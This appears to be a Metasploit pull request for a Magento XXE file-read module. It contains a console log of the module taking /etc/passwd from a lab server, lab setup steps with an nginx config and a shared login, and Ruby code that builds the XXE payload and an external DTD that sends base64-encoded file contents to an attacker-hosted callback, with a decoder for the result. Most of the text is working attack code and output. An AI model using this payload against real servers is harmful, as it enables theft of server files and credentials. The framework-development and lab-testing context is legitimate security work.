ec6540b806
```
jvoisin@kaa 16:10 /opt/msf ./msfconsole
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *
=[ metasploit v4.11.5-dev-9a0f0a7 ]
+ -- --=[ 1505 exploits - 867 auxiliary - 251 post ]
+ -- --=[ 434 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use auxiliary/gather/magento_xxe
msf auxiliary(magento_xxe) > set RPORT 8080
RPORT => 8080
msf auxiliary(magento_xxe) > set SRVHOST 192.168.1.11
SRVHOST => 192.168.1.11
msf auxiliary(magento_xxe) > setg RHOST 192.168.1.25
RHOST => 192.168.1.25
msf auxiliary(magento_xxe) > show options
Module options (auxiliary/gather/magento_xxe):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILEPATH   /etc/passwd      yes       The filepath to read on the server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.25     yes       The target address
   RPORT      8080             yes       The target port
   SRVHOST    192.168.1.11     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base Magento directory path
   URIPATH    fetch.php        yes       The URI path to use for this exploit to get the data back
   VHOST                       no        HTTP server virtual host
msf auxiliary(magento_xxe) > run
[*] Using URL: http://192.168.1.11:8080/fetch.php
[*] Server started.
[*] 192.168.1.25 magento_xxe - Got an answer from the server.
[+] 192.168.1.25 magento_xxe - File /etc/passwd found and saved to path: /home/jvoisin/.msf4/loot/20151113163706_default_192.168.1.25_magento.file_415167.txt
[*] Server stopped.
[*] Auxiliary module execution completed
```
1. [ ] Get the "Community Edition" of magento on [its website]( https://www.magentocommerce.com/download ) (Feel free to use bugmenot@mailinator.com/Password1 to log in)
2. [ ] Install nginx and php-fpm. This is the configuration that I used:
```
server {
    # Listen on every interface and explicitly on the lab address that
    # the module's RHOST points at (192.168.1.25:8080)
    listen 0.0.0.0:8080 default;
    listen 192.168.1.25:8080;
    server_name _;

    # Magento Community Edition is unpacked here
    root /var/www2/;
    index index.php;

    # Strip the trailing path info from /js/index.php/x.js so the request
    # is handled as the PHP script /js/index.php
    location = /js/index.php/x.js { rewrite ^(.*\.php)/ $1 last; }

    # Serve static files directly; everything else goes to Magento's front controller
    location / { try_files $uri $uri/ @rewrite; }
    location @rewrite { rewrite / /index.php?$args; }

    # Hand .php scripts to php-fpm over its UNIX socket; 404 if the script does not exist
    location ~ \.php$ {
        try_files $uri =404;
        fastcgi_pass unix:/var/run/php5-fpm.sock;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        include fastcgi_params;
    }
}
```
3. [ ] Launch metasploit, `use auxiliary/gather/magento_xxe`, set options
4. [ ] Get your file exfiltrated in your loot.
1. The XML is hand-crafted because I don't know how to Nokogiri
2. I'm quite sure that the `service.stop` in the `primer` function is wrong. What is the regular way to handle this?
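As an added example, not code from this PR or from the module itself, the following plain Ruby shows the three pieces the SRVHOST/URIPATH/FILEPATH options above correspond to in an out-of-band XXE file read: the XML handed to the target, the external DTD the target's parser fetches from the attacker's server, and the callback handler that recovers the file from the resulting request. The DTD URL, the `fetch.php` callback URL, the request line and the use of the `php://filter` stream wrapper (which assumes a PHP/libxml target) are assumptions made for illustration.

```ruby
# Added example (not the module's code): out-of-band XXE file read, in plain
# Ruby. URLs, the sample request line and the php://filter wrapper are assumptions.

# Stage 1: the XML submitted to the target. It performs no file read itself;
# it only references an external DTD hosted on the attacker's server.
def build_xxe_document(dtd_url)
  <<~XML
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE data [
      <!ENTITY % remote SYSTEM "#{dtd_url}">
      %remote;
    ]>
    <data/>
  XML
end

# Stage 2: the external DTD served from SRVHOST. A parameter entity reads the
# file through php://filter (assumed: PHP/libxml on the target) so the content
# comes back base64-encoded and survives being placed in a URL query string.
# The indirection through &#x25; (a literal '%') is the usual way to get the
# expanded file content into the SYSTEM URL of a second entity, whose fetch
# is what delivers the data to the callback.
def build_oob_dtd(callback_url, filepath)
  <<~DTD
    <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=#{filepath}">
    <!ENTITY % wrapper "<!ENTITY &#x25; send SYSTEM '#{callback_url}?data=%file;'>">
    %wrapper;
    %send;
  DTD
end

# Stage 3: what the callback handler (URIPATH in the module's terms) does when
# the target's parser requests the "send" entity: pull the base64 out of the
# query string and decode it. Returns nil for a request carrying no data,
# such as the parser's initial fetch of the DTD itself.
def extract_exfiltrated_file(request_line)
  m = request_line.match(%r{\A[A-Z]+ (\S+) HTTP/1\.[01]\s*\z})
  return nil unless m
  query = m[1].split('?', 2)[1]
  return nil if query.nil?
  pair = query.split('&').map { |kv| kv.split('=', 2) }.find { |k, _| k == 'data' }
  return nil if pair.nil? || pair[1].nil?
  # Undo percent-encoding only: '+' is a base64 character here, not a space
  raw = pair[1].gsub(/%([0-9A-Fa-f]{2})/) { $1.hex.chr }
  raw.unpack1('m')
end

if __FILE__ == $PROGRAM_NAME
  puts build_xxe_document('http://192.168.1.11:8080/xxe.dtd')
  puts build_oob_dtd('http://192.168.1.11:8080/fetch.php', '/etc/passwd')
  # Constructed request line: base64 of "root:x:0:0:" as the parser would send it
  puts extract_exfiltrated_file('GET /fetch.php?data=cm9vdDp4OjA6MDo= HTTP/1.1')
end
```

The split into two stages is what makes SRVHOST necessary: the interesting part of the payload lives in the DTD on the attacker's side rather than in the request, and the file only ever leaves the target as a URL the parser fetches, which is why the callback path has to decode rather than read a body.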